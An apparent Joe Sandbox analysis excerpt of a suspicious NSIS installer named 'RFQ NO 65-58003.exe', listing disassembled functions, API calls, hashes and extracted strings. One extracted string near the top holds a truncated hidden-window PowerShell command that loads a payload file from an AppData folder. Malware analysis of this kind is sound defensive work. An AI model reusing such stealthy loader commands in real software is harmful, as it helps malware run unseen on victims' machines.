                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: (7B$A$C:\Users\user\AppData\Roaming\afdragsordning$powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas
                                                              • API String ID: 2624150263-3259473516
                                                              • Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                              • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
                                                              • Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                              • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
                                                              Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming\afdragsordning\Overrack2, xrefs: 004021C3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Roaming\afdragsordning\Overrack2
                                                              • API String ID: 542301482-2472733074
                                                              • Opcode ID: 61b713bc69220648ef0ee8d4cb260af03843adae2956f13d344839b2a1627aa1
                                                              • Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
                                                              • Opcode Fuzzy Hash: 61b713bc69220648ef0ee8d4cb260af03843adae2956f13d344839b2a1627aa1
                                                              • Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54
                                                              Function 00404473 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404525
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
                                                              • GetSysColor.USER32(?), ref: 00404553
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
                                                              • lstrlenW.KERNEL32(?), ref: 00404574
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
                                                              • GetDlgItem.USER32(?,0000040A), ref: 004045EF
                                                              • SendMessageW.USER32(00000000), ref: 004045F6
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404621
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
                                                              • SetCursor.USER32(00000000), ref: 00404675
                                                              • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
                                                              • SetCursor.USER32(00000000), ref: 00404699
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                              • String ID: N$open$C@
                                                              • API String ID: 3615053054-346628716
                                                              • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                              • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
                                                              • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                              • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                              • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                              • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                              • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                              Function 00405F41 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,004060D4,?,?), ref: 00405F50
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,004060D4,?,?), ref: 00405F74
                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
                                                                • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                                • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                              • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
                                                              • wsprintfA.USER32 ref: 00405FB8
                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
                                                              • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
                                                              • GlobalFree.KERNEL32(00000000), ref: 004060A1
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
                                                                • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405DEB
                                                                • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                              • API String ID: 222337774-899692902
                                                              • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                              • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
                                                              • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                              • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
                                                              Function 004064A6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                              • CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                              • CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                              • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                              Strings
                                                              • "C:\Users\user\Desktop\RFQ NO 65-58003.exe", xrefs: 004064A6
                                                              • *?|<>/":, xrefs: 004064F8
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-993393911
                                                              • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                              • Instruction ID: 798f9d5398cbdb919d0ccd284a00eb8243013f3251525297edaf214bcc17b89f
                                                              • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
                                                              • Instruction Fuzzy Hash: 30110815801612A5D7307B149C40AB776E8EFA5764F52803FEC8A733C5E77C5CA286AD
                                                              Function 0040433D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
                                                              • GetSysColor.USER32(00000000), ref: 00404376
                                                              • SetTextColor.GDI32(?,00000000), ref: 00404382
                                                              • SetBkMode.GDI32(?,?), ref: 0040438E
                                                              • GetSysColor.USER32(?), ref: 004043A1
                                                              • SetBkColor.GDI32(?,?), ref: 004043B1
                                                              • DeleteObject.GDI32(?), ref: 004043CB
                                                              • CreateBrushIndirect.GDI32(?), ref: 004043D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                              • Instruction ID: f1e38b434243e48c2b46a4a8fcf45a1f38fac15713e13bd475e5664ee3236b4b
                                                              • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                              • Instruction Fuzzy Hash: F0215171600704ABCB219F68DD48B5BBBF8AF41714F04892DEDD5E26E0D778E904CB54
                                                              Function 00402660 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026CC
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740
                                                                • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                              • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
                                                              • Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                              • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59
                                                              Function 00402E33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
                                                              • GetTickCount.KERNEL32 ref: 00402E6C
                                                              • wsprintfW.USER32 ref: 00402E9A
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                                • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
                                                                • Part of subcall function 00402E17: MulDiv.KERNEL32(0033D8FA,00000064,0033F144), ref: 00402E2C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 722711167-2449383134
                                                              • Opcode ID: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                              • Instruction ID: 8dd11ec53df0ba6bdd92dbd1cf8f77c56262218af4b431f1c1abafb00f700e94
                                                              • Opcode Fuzzy Hash: 68327632d04469364c1974b45a761d3b68d751ecd12d8829f1a69e2ac19d740d
                                                              • Instruction Fuzzy Hash: FB016570541614DBC7216B50EE0DA9B7B58AB00B45B14413FF941F12D1DBF844A58BEE
                                                              Function 00404C3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
                                                              • GetMessagePos.USER32 ref: 00404C5E
                                                              • ScreenToClient.USER32(?,?), ref: 00404C78
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
